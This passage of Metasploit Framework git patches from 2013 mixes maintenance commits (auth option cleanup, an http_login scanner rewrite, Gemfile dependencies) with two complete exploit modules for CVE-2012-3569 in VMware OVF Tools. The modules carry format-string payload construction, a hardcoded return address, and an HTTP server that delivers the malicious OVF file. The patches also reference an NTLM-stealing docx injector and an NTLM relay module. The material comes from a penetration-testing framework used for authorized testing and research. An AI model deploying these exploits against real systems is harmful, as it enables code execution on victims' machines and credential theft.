val="phClr"><a:shade val="20000"/><a:satMod val="255000"/></a:schemeClr></a:gs></a:gsLst><a:path path="circle"><a:fillToRect l="50000" t="-80000" r="50000" b="180000"/></a:path></a:gradFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="80000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:shade val="30000"/><a:satMod val="200000"/></a:schemeClr></a:gs></a:gsLst><a:path path="circle"><a:fillToRect l="50000" t="50000" r="50000" b="50000"/></a:path></a:gradFill></a:bgFillStyleLst></a:fmtScheme></a:themeElements><a:objectDefaults/><a:extraClrSchemeLst/></a:theme> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/webSettings.xml b/modules/auxiliary/docx/sourcedoc/word/webSettings.xml deleted file mode 100644 index b4a16977f713..000000000000 --- a/modules/auxiliary/docx/sourcedoc/word/webSettings.xml +++ /dev/null @@ -1,2 +0,0 @@ -<?xml version="1.0" encoding="UTF-8" standalone="yes"?> -<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:optimizeForBrowser/></w:webSettings> \ No newline at end of file From fa1811ac38ab93a3a46039acedfcdec3fd81750b Mon Sep 17 00:00:00 2001 From: SphaZ <cyberphaz@gmail.com> Date: Mon, 4 Feb 2013 15:25:11 +0100 Subject: [PATCH 262/421] changed SOURCE to be OptPath --- modules/auxiliary/docx/word_unc_injector.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb index ccf94a838f6e..66c5325d38cb 100644 --- a/modules/auxiliary/docx/word_unc_injector.rb +++ b/modules/auxiliary/docx/word_unc_injector.rb @@ -38,7 +38,7 @@ def initialize(info = {}) register_options( [ OptAddress.new('LHOST',[true, 'Server IP or hostname that the .docx document points to.','']), - OptString.new('SOURCE', [false, 'Full path and filename of .docx file to use as source. If empty, creates new document', '']), + OptPath.new('SOURCE', [false, 'Full path and filename of .docx file to use as source. If empty, creates new document', '']), OptString.new('FILENAME', [true, 'Document output filename.', 'stealnetNTLM.docx']), OptString.new('DOCAUTHOR',[false,'Document author for empty document.', 'SphaZ']), ], self.class) From 135718a97b9c0242f5f2c615090507b3498e5209 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Mon, 4 Feb 2013 16:36:33 +0100 Subject: [PATCH 263/421] Added module for cve-2012-3569, fileformat version --- .../windows/fileformat/ovf_format_string.rb | 119 ++++++++++++++++++ 1 file changed, 119 insertions(+) create mode 100644 modules/exploits/windows/fileformat/ovf_format_string.rb diff --git a/modules/exploits/windows/fileformat/ovf_format_string.rb b/modules/exploits/windows/fileformat/ovf_format_string.rb new file mode 100644 index 000000000000..cbd21fed2aae --- /dev/null +++ b/modules/exploits/windows/fileformat/ovf_format_string.rb @@ -0,0 +1,119 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'VMWare OVF Tools Format String Vulnerability', + 'Description' => %q{ + This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for + Windows. The vulnerability occurs when printing error messages while parsing a + a malformed OVF file. The module has been tested successfully with VMWare OVF Tools + 2.1 on Windows XP SP3. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Jeremy Brown', # Vulnerability discovery + 'juan vazquez' # Metasploit Module + ], + 'References' => + [ + [ 'CVE', '2012-3569' ], + [ 'OSVDB', '87117' ], + [ 'BID', '56468' ], + [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2012-0015.html' ] + ], + 'Payload' => + { + 'DisableNops' => true, + 'BadChars' => + (0x00..0x08).to_a.pack("C*") + + "\x0b\x0c\x0e\x0f" + + (0x10..0x1f).to_a.pack("C*") + + (0x80..0xff).to_a.pack("C*") + + "\x22", + 'StackAdjustment' => -3500, + 'PrependEncoder' => "\x54\x59", # push esp # pop ecx + 'EncoderOptions' => + { + 'BufferRegister' => 'ECX', + 'BufferOffset' => 6 + } + }, + 'Platform' => 'win', + 'Targets' => + [ + # vmware-ovftool-2.1.0-467744-win-i386.msi + [ 'VMWare OVF Tools 2.1 on Windows XP SP3', + { + 'Ret' => 0x7852753d, # call esp # MSVCR90.dll 9.00.30729.4148 installed with VMware OVF Tools 2.1 + 'AddrPops' => 98, + 'StackPadding' => 38081, + 'Alignment' => 4096 + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Nov 08 2012', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.ovf']), + ], self.class) + end + + def ovf + my_payload = rand_text_alpha(4) # ebp + my_payload << [target.ret].pack("V") # eip # call esp + my_payload << payload.encoded + + fs = rand_text_alpha(target['StackPadding']) # Padding until address aligned to 0x10000 (for example 0x120000) + fs << rand_text_alpha(target['Alignment']) # Align to 0x11000 + fs << my_payload + # 65536 => 0x10000 + # 27 => Error message prefix length + fs << rand_text_alpha(65536 - 27 - target['StackPadding'] - target['Alignment'] - my_payload.length - (target['AddrPops'] * 8)) + fs << "%08x" * target['AddrPops'] # Reach saved EBP + fs << "%hn" # Overwrite LSW of saved EBP with 0x1000 + + ovf_file = <<-EOF +<?xml version="1.0" encoding="UTF-8"?> +<Envelope vmw:buildId="build-162856" xmlns="http://schemas.dmtf.org/ovf/envelope/1" +xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" +xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1" +xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData" +xmlns:vmw="http://www.vmware.com/schema/ovf" +xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData" +xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> + <References> + <File ovf:href="Small VM-disk1.vmdk" ovf:id="file1" ovf:size="68096" /> + </References> + <DiskSection> + <Info>Virtual disk information</Info> + <Disk ovf:capacity="8" ovf:capacityAllocationUnits="#{fs}" ovf:diskId="vmdisk1" ovf:fileRef="file1" ovf:format="http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized" /> + </DiskSection> + <VirtualSystem ovf:id="Small VM"> + <Info>A virtual machine</Info> + </VirtualSystem> +</Envelope> + EOF + ovf_file + end + + def exploit + print_status("Creating '#{datastore['FILENAME']}'. This files should be opened with VMMWare OVF 2.1") + file_create(ovf) + end +end From e0d4bb57990db69576719389753adf4d24690404 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Mon, 4 Feb 2013 16:37:42 +0100 Subject: [PATCH 264/421] Added module for cve-2012-3569, browser version --- .../windows/browser/ovftool_format_string.rb | 130 ++++++++++++++++++ 1 file changed, 130 insertions(+) create mode 100644 modules/exploits/windows/browser/ovftool_format_string.rb diff --git a/modules/exploits/windows/browser/ovftool_format_string.rb b/modules/exploits/windows/browser/ovftool_format_string.rb new file mode 100644 index 000000000000..d15d81b06c4c --- /dev/null +++ b/modules/exploits/windows/browser/ovftool_format_string.rb @@ -0,0 +1,130 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info={}) + super(update_info(info, + 'Name' => 'VMWare OVF Tools Format String Vulnerability', + 'Description' => %q{ + This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for + Windows. The vulnerability occurs when printing error messages while parsing a + a malformed OVF file. The module has been tested successfully with VMWare OVF Tools + 2.1 on Windows XP SP3. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Jeremy Brown', # Vulnerability discovery + 'juan vazquez' # Metasploit Module + ], + 'References' => + [ + [ 'CVE', '2012-3569' ], + [ 'OSVDB', '87117' ], + [ 'BID', '56468' ], + [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2012-0015.html' ] + ], + 'Payload' => + { + 'DisableNops' => true, + 'BadChars' => + (0x00..0x08).to_a.pack("C*") + + "\x0b\x0c\x0e\x0f" + + (0x10..0x1f).to_a.pack("C*") + + (0x80..0xff).to_a.pack("C*") + + "\x22", + 'StackAdjustment' => -3500, + 'PrependEncoder' => "\x54\x59", # push esp # pop ecx + 'EncoderOptions' => + { + 'BufferRegister' => 'ECX', + 'BufferOffset' => 6 + } + }, + 'Platform' => 'win', + 'Targets' => + [ + # vmware-ovftool-2.1.0-467744-win-i386.msi + [ 'VMWare OVF Tools 2.1 on Windows XP SP3', + { + 'Ret' => 0x7852753d, # call esp # MSVCR90.dll 9.00.30729.4148 installed with VMware OVF Tools 2.1 + 'AddrPops' => 98, + 'StackPadding' => 38081, + 'Alignment' => 4096 + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Nov 08 2012', + 'DefaultTarget' => 0)) + + end + + def ovf + my_payload = rand_text_alpha(4) # ebp + my_payload << [target.ret].pack("V") # eip # call esp + my_payload << payload.encoded + + fs = rand_text_alpha(target['StackPadding']) # Padding until address aligned to 0x10000 (for example 0x120000) + fs << rand_text_alpha(target['Alignment']) # Align to 0x11000 + fs << my_payload + # 65536 => 0x10000 + # 27 => Error message prefix length + fs << rand_text_alpha(65536 - 27 - target['StackPadding'] - target['Alignment'] - my_payload.length - (target['AddrPops'] * 8)) + fs << "%08x" * target['AddrPops'] # Reach saved EBP + fs << "%hn" # Overwrite LSW of saved EBP with 0x1000 + + ovf_file = <<-EOF +<?xml version="1.0" encoding="UTF-8"?> +<Envelope vmw:buildId="build-162856" xmlns="http://schemas.dmtf.org/ovf/envelope/1" +xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" +xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1" +xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData" +xmlns:vmw="http://www.vmware.com/schema/ovf" +xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData" +xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> + <References> + <File ovf:href="Small VM-disk1.vmdk" ovf:id="file1" ovf:size="68096" /> + </References> + <DiskSection> + <Info>Virtual disk information</Info> + <Disk ovf:capacity="8" ovf:capacityAllocationUnits="#{fs}" ovf:diskId="vmdisk1" ovf:fileRef="file1" ovf:format="http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized" /> + </DiskSection> + <VirtualSystem ovf:id="Small VM"> + <Info>A virtual machine</Info> + </VirtualSystem> +</Envelope> + EOF + ovf_file + end + + def on_request_uri(cli, request) + agent = request.headers['User-Agent'] + uri = request.uri + + if agent !~ /VMware-client/ or agent !~ /ovfTool/ + print_status("User agent #{agent} not recognized, answering Not Found...") + send_not_found(cli) + end + + if uri =~ /.mf$/ + # The manifest file isn't required + print_status("Sending Not Found for Manifest file request...") + send_not_found(cli) + end + + print_status("Sending OVF exploit...") + send_response(cli, ovf, {'Content-Type'=>'text/xml'}) + end + +end \ No newline at end of file From 9ce5f39bc6afae2352c04edcc7d3626327743831 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Mon, 4 Feb 2013 16:42:56 +0100 Subject: [PATCH 265/421] added migrate as initial script --- modules/exploits/windows/browser/ovftool_format_string.rb | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/modules/exploits/windows/browser/ovftool_format_string.rb b/modules/exploits/windows/browser/ovftool_format_string.rb index d15d81b06c4c..fa3681ff88f2 100644 --- a/modules/exploits/windows/browser/ovftool_format_string.rb +++ b/modules/exploits/windows/browser/ovftool_format_string.rb @@ -51,6 +51,10 @@ def initialize(info={}) 'BufferOffset' => 6 } }, + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f' + }, 'Platform' => 'win', 'Targets' => [ From 2c3de43f4b8c0e4d037feb3a51907a13228932bb Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 4 Feb 2013 12:10:44 -0600 Subject: [PATCH 266/421] datastore opts cleanup cleanuo digestauth datastore options in modules --- modules/auxiliary/gather/shodan_search.rb | 4 ++-- modules/auxiliary/server/http_ntlmrelay.rb | 3 +-- .../exploits/windows/http/xampp_webdav_upload_php.rb | 10 ++++------ 3 files changed, 7 insertions(+), 10 deletions(-) diff --git a/modules/auxiliary/gather/shodan_search.rb b/modules/auxiliary/gather/shodan_search.rb index 8b114dbdd874..6f63b7b95d0d 100644 --- a/modules/auxiliary/gather/shodan_search.rb +++ b/modules/auxiliary/gather/shodan_search.rb @@ -38,10 +38,10 @@ def initialize(info = {}) )) # disabling all the unnecessary options that someone might set to break our query - deregister_options('RPORT','RHOST', 'BasicAuthPass', 'BasicAuthUser', 'DOMAIN', + deregister_options('RPORT','RHOST', 'DOMAIN', 'DigestAuthIIS', 'SSLVersion', 'NTLM::SendLM', 'NTLM::SendNTLM', 'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', - 'NTLM::UseNTLMv2', 'DigestAuthPassword', 'DigestAuthUser', 'SSL') + 'NTLM::UseNTLMv2', 'SSL') register_options( [ diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index fda08e41c47f..080803918b83 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb @@ -84,8 +84,7 @@ def initialize(info = {}) 'IPC$,ADMIN$,C$,D$,CCMLOGS$,ccmsetup$,share,netlogon,sysvol']) ], self.class) - deregister_options('BasicAuthPass', 'BasicAuthUser', 'DOMAIN', 'DigestAuthPassword', - 'DigestAuthUser', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey', + deregister_options('DOMAIN', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2') end diff --git a/modules/exploits/windows/http/xampp_webdav_upload_php.rb b/modules/exploits/windows/http/xampp_webdav_upload_php.rb index c19096b2c8e9..c4d36a61f1fc 100644 --- a/modules/exploits/windows/http/xampp_webdav_upload_php.rb +++ b/modules/exploits/windows/http/xampp_webdav_upload_php.rb @@ -36,8 +36,8 @@ def initialize [ OptString.new('PATH', [ true, "The path to attempt to upload", '/webdav/']), OptString.new('FILENAME', [ false , "The filename to give the payload. (Leave Blank for Random)"]), - OptString.new('RUSER', [ true, "The Username to use for Authentication", 'wampp']), - OptString.new('RPASS', [ true, "The Password to use for Authentication", 'xampp']) + OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', 'wampp']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', 'xampp']) ], self.class) end @@ -46,12 +46,10 @@ def initialize def exploit uri = build_path print_status "Uploading Payload to #{uri}" - res,c = send_digest_request_cgi({ + res = send_request_cgi({ 'uri' => uri, 'method' => 'PUT', - 'data' => payload.raw, - 'DigestAuthUser' => datastore['RUSER'], - 'DigestAuthPassword' => datastore['RPASS'] + 'data' => payload.raw }, 25) unless (res and res.code == 201) print_error "Failed to upload file!" From 9497e38ef755089d9a678d25054375b323a6fb84 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 4 Feb 2013 12:31:19 -0600 Subject: [PATCH 267/421] Fix http login scanner Fix the http_login scanner to use new buitin auth --- lib/msf/core/exploit/http/client.rb | 48 +---- lib/rex/proto/http/client.rb | 2 + modules/auxiliary/scanner/http/http_login.rb | 183 +++---------------- 3 files changed, 29 insertions(+), 204 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 808646a8435b..293a4acd4cc0 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -274,6 +274,10 @@ def send_request_raw(opts={}, timeout = 20) def send_request_cgi(opts={}, timeout = 20) begin c = connect(opts) + if opts['username'] and opts['username'] != '' + c.username = opts['username'].to_s + c.password = opts['password'].to_s + end r = c.request_cgi(opts) c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout) rescue ::Errno::EPIPE, ::Timeout::Error @@ -289,50 +293,6 @@ def basic_auth datastore['USERNAME'].to_s + ":" + (datastore['PASSWORD'].to_s || '') end - # - # Authenticates to the remote host based on the most appropriate authentication method, - # and returns the HTTP response. If there are multiple auth methods supported, then it - # will pick one in the following order: Basic, Digest, Negotiate, and then NTLM. - # - # Options: - # - username: The username to authenticate as - # - password: The password to authenticate with - # - def send_request_smart_auth(opts={}, timeout=20) - res = send_request_cgi(opts,timeout) - return nil if res.nil? - return res unless res.code == 401 - return res if opts['username'].blank? - return res unless res.headers['WWW-Authenticate'] - - if res.headers['WWW-Authenticate'].include? "Basic" - opts['password']||= '' - opts['basic_auth'] = opts['username'] + ":" + opts['password'] - res = send_request_cgi(opts,timeout) - return res - - elsif res.headers['WWW-Authenticate'].include? "Digest" - opts['DigestAuthUser'] = opts['username'] - opts['DigestAuthPassword'] = opts['password'] - res = send_digest_request_cgi(opts,timeout) - return res - - elsif res.headers['WWW-Authenticate'].include? "Negotiate" - opts['provider'] = 'Negotiate' - res = send_request_auth_negotiate(opts,timeout) - return res - - elsif res.headers['WWW-Authenticate'].include? "NTLM" - opts['provider'] = 'NTLM' - res = send_request_auth_negotiate(opts,timeout) - return res - - end - - return nil - end - - ## # # Wrappers for getters diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 8c32ed3c2baf..725f451b4253 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -581,6 +581,8 @@ def negotiate_auth(opts={}) } to = opts['timeout'] || 20 + opts['username'] ||= self.username.to_s + opts['password'] ||= self.password.to_s if opts['provider'] and opts['provider'].include? 'Negotiate' provider = "Negotiate " diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 570ed26c28a4..fcf69e28e0a2 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -48,9 +48,7 @@ def initialize register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ]) end - def find_auth_uri_and_scheme - - path_and_scheme = [] + def find_auth_uri if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0 paths = [datastore['AUTH_URI']] else @@ -80,21 +78,9 @@ def find_auth_uri_and_scheme next if not res end - next if not res.code == 401 - next if not res.headers['WWW-Authenticate'] - path_and_scheme << path - case res.headers['WWW-Authenticate'] - when /Basic/i - path_and_scheme << "Basic" - when /NTLM/i - path_and_scheme << "NTLM" - when /Digest/i - path_and_scheme << "Digest" - end - return path_and_scheme + return path end - return path_and_scheme end def target_url @@ -111,7 +97,7 @@ def run_host(ip) print_error("You need need to set AUTH_URI when using PUT Method !") return end - @uri, @scheme = find_auth_uri_and_scheme() + @uri = find_auth_uri() if ! @uri print_error("#{target_url} No URI found that asks for HTTP authentication") return @@ -119,12 +105,7 @@ def run_host(ip) @uri = "/#{@uri}" if @uri[0,1] != "/" - if ! @scheme - print_error("#{target_url} Incompatible authentication scheme") - return - end - - print_status("Attempting to login to #{target_url} with #{@scheme} authentication") + print_status("Attempting to login to #{target_url}") each_user_pass { |user, pass| do_login(user, pass) @@ -133,27 +114,23 @@ def run_host(ip) def do_login(user='admin', pass='admin') vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'") - success = false - proof = "" - - ret = do_http_login(user,pass,@scheme) - return :abort if ret == :abort - if ret == :success - proof = @proof.dup - success = true - end - if success + response = do_http_login(user,pass) + result = determine_result(response) + + return :abort if result == :abort + + if result == :success print_good("#{target_url} - Successful login '#{user}' : '#{pass}'") any_user = false any_pass = false vprint_status("#{target_url} - Trying random username with password:'#{pass}'") - any_user = do_http_login(Rex::Text.rand_text_alpha(8), pass, @scheme) + any_user = determine_result(do_http_login(Rex::Text.rand_text_alpha(8), pass)) vprint_status("#{target_url} - Trying username:'#{user}' with random password") - any_pass = do_http_login(user, Rex::Text.rand_text_alpha(8), @scheme) + any_pass = determine_result(do_http_login(user, Rex::Text.rand_text_alpha(8))) if any_user == :success user = "anyuser" @@ -175,7 +152,7 @@ def do_login(user='admin', pass='admin') :sname => (ssl ? 'https' : 'http'), :user => user, :pass => pass, - :proof => "WEBAPP=\"Generic\", PROOF=#{proof}", + :proof => "WEBAPP=\"Generic\", PROOF=#{response.to_s}", :source_type => "user_supplied", :active => true ) @@ -188,142 +165,28 @@ def do_login(user='admin', pass='admin') end end - def do_http_login(user,pass,scheme) - case scheme - when /NTLM/i - do_http_auth_ntlm(user,pass) - when /Digest/i - do_http_auth_digest(user,pass,datastore['REQUESTTYPE']) - when /Basic/i - do_http_auth_basic(user,pass) - else - vprint_error("#{target_url}: Unknown authentication scheme") - return :abort - end - end - - def do_http_auth_ntlm(user,pass) + def do_http_login(user,pass) begin - resp = send_request_auth_negotiate( + response = send_request_cgi({ 'uri' => @uri, + 'method' => datastore['REQUESTTYPE'], 'username' => user, 'password' => pass - ) - return :abort if (resp.code == 404) - - if [200, 301, 302].include?(resp.code) - @proof = resp - return :success - end - + }) + return response rescue ::Rex::ConnectionError vprint_error("#{target_url} - Failed to connect to the web server") - return :abort + return nil end - - return :fail end - def do_http_auth_basic(user,pass) - user_pass = Rex::Text.encode_base64(user + ":" + pass) - - begin - res = send_request_cgi({ - 'uri' => @uri, - 'method' => 'GET', - 'headers' => - { - 'Authorization' => "Basic #{user_pass}", - } - }, 25) - - unless (res.kind_of? Rex::Proto::Http::Response) - vprint_error("#{target_url} not responding") - return :abort - end - - return :abort if (res.code == 404) - - if [200, 301, 302].include?(res.code) - @proof = res - return :success - end - - rescue ::Rex::ConnectionError - vprint_error("#{target_url} - Failed to connect to the web server") - return :abort - end - + def determine_result(response) + return :abort unless response.kind_of? Rex::Proto::Http::Response + return :abort unless response.code + return :success if [200, 301, 302].include?(response.code) return :fail end - def do_http_auth_digest(user,pass,requesttype) - path = datastore['AUTH_URI'] || "/" - begin - if requesttype == "PUT" - res= send_digest_request_cgi({ - 'uri' => path, - 'method' => requesttype, - 'data' => 'Test123\r\n', - #'DigestAuthIIS' => false, - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass - }, 25) - elsif requesttype == "PROPFIND" - res = send_digest_request_cgi({ - 'uri' => path, - 'method' => requesttype, - 'data' => '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>', - #'DigestAuthIIS' => false, - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass, - 'headers' => { 'Depth' => '0'} - }, 25) - else - res= send_digest_request_cgi({ - 'uri' => path, - 'method' => requesttype, - #'DigestAuthIIS' => false, - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass - }, 25) - end - - unless (res.kind_of? Rex::Proto::Http::Response) - vprint_error("#{target_url} not responding") - return :abort - end - - return :abort if (res.code == 404) - - if ( [200, 301, 302].include?(res.code) ) or (res.code == 201) - if ((res.code == 201) and (requesttype == "PUT")) - print_good("Trying to delete #{path}") - del_res = send_digest_request_cgi({ - 'uri' => path, - 'method' => 'DELETE', - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass - }, 25) - if not (del_res.code == 204) - print_error("#{path} could be created, but not deleted again. This may have been noisy ...") - end - end - @proof = res - return :success - end - - if (res.code == 207) and (requesttype == "PROPFIND") - @proof = res - return :success - end - - rescue ::Rex::ConnectionError - vprint_error("#{target_url} - Failed to connect to the web server") - return :abort - end - return :fail - end end From 8b1febb4cfc879706bc9cf4e700e048628bc954f Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 4 Feb 2013 12:32:43 -0600 Subject: [PATCH 268/421] add myself to the blame list for the module =P --- modules/auxiliary/scanner/http/http_login.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index fcf69e28e0a2..076bb36d70f6 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -26,7 +26,7 @@ def initialize [ ], - 'Author' => [ 'hdm' ], + 'Author' => [ 'hdm' , 'thelightcosine'], 'References' => [ [ 'CVE', '1999-0502'] # Weak password From 090690e440be355692250a9f25e16ed87b60547e Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 4 Feb 2013 12:41:38 -0600 Subject: [PATCH 269/421] Add msgpack to gem deps --- Gemfile | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Gemfile b/Gemfile index 502e0060b3cc..376e177bfccc 100755 --- a/Gemfile +++ b/Gemfile @@ -5,6 +5,8 @@ gem 'activesupport', '>= 3.0.0' # Database models shared between framework and Pro. gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.4.0' +gem 'msgpack' + group :development do # Markdown formatting for yard gem 'redcarpet' From 6a7cd3cac2f9f338e8e130d6c3f30a88bf79e247 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 4 Feb 2013 12:47:36 -0600 Subject: [PATCH 270/421] Add better deps to Gemfile Thanks, @bturner-r7 for tracking these down. --- Gemfile | 14 ++++++++++++-- 1 file changed, 12 insertions(+), 2 deletions(-) diff --git a/Gemfile b/Gemfile index 376e177bfccc..dcdea0185f3c 100755 --- a/Gemfile +++ b/Gemfile @@ -2,10 +2,20 @@ source 'http://rubygems.org' # Need 3+ for ActiveSupport::Concern gem 'activesupport', '>= 3.0.0' +# Needed for Msf::DbManager +gem 'activerecord' +# Needed for some admin modules (scrutinizer_add_user.rb) +gem 'json' # Database models shared between framework and Pro. -gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.4.0' - +gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.3.0' +# Needed by msfgui and other rpc components gem 'msgpack' +# Needed by anemone crawler +gem 'nokogiri' +# Needed for module caching in Mdm::ModuleDetails +gem 'pg', '>= 0.11' +# Needed by anemone crawler +gem 'robots' group :development do # Markdown formatting for yard From d28557ddedec17d77cb103324bb189b1e2c0ba4d Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Mon, 4 Feb 2013 12:59:05 -0600 Subject: [PATCH 271/421] Merge branch 'master', remote-tracking branch 'origin/master' From 4c1e630bf36077d954bc2f448e26fdd51e201351 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 4 Feb 2013 13:02:26 -0600 Subject: [PATCH 272/421] BasicAuth datastore cleanup cleanup all the old BasicAuth datastore options --- .../auxiliary/scanner/http/cisco_device_manager.rb | 4 ++-- modules/exploits/linux/http/piranha_passwd_exec.rb | 6 +++--- modules/exploits/multi/http/axis2_deployer.rb | 4 +--- modules/exploits/multi/http/jboss_bshdeployer.rb | 3 --- modules/exploits/multi/http/jboss_maindeployer.rb | 3 --- modules/exploits/multi/http/tomcat_mgr_deploy.rb | 14 ++++---------- .../exploits/unix/webapp/oracle_vm_agent_utl.rb | 3 --- modules/exploits/windows/http/easyftp_list.rb | 4 ++-- 8 files changed, 12 insertions(+), 29 deletions(-) diff --git a/modules/auxiliary/scanner/http/cisco_device_manager.rb b/modules/auxiliary/scanner/http/cisco_device_manager.rb index fd57fda9bbfe..9486262be789 100644 --- a/modules/auxiliary/scanner/http/cisco_device_manager.rb +++ b/modules/auxiliary/scanner/http/cisco_device_manager.rb @@ -26,7 +26,7 @@ def initialize(info={}) 'Name' => 'Cisco Device HTTP Device Manager Access', 'Description' => %q{ This module gathers data from a Cisco device (router or switch) with the device manager - web interface exposed. The BasicAuthUser and BasicAuthPass options can be used to specify + web interface exposed. The USERNAME and PASSWORD options can be used to specify authentication. }, 'Author' => [ 'hdm' ], @@ -61,7 +61,7 @@ def run_host(ip) print_good("#{rhost}:#{rport} Successfully authenticated to this device") # Report a vulnerability only if no password was specified - if datastore['BasicAuthPass'].to_s.length == 0 + if datastore['PASSWORD'].to_s.length == 0 report_vuln( { diff --git a/modules/exploits/linux/http/piranha_passwd_exec.rb b/modules/exploits/linux/http/piranha_passwd_exec.rb index d87027cadb50..4312fa2bd482 100644 --- a/modules/exploits/linux/http/piranha_passwd_exec.rb +++ b/modules/exploits/linux/http/piranha_passwd_exec.rb @@ -72,8 +72,8 @@ def initialize(info = {}) register_options( [ - OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'piranha']), - OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'q']), + OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'piranha']), + OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'q']), ], self.class) end @@ -96,7 +96,7 @@ def exploit end if res.code == 401 - print_error("401 Authorization Required! Our BasicAuthUser and BasicAuthPass credentials not accepted!") + print_error("401 Authorization Required! Our credentials were not 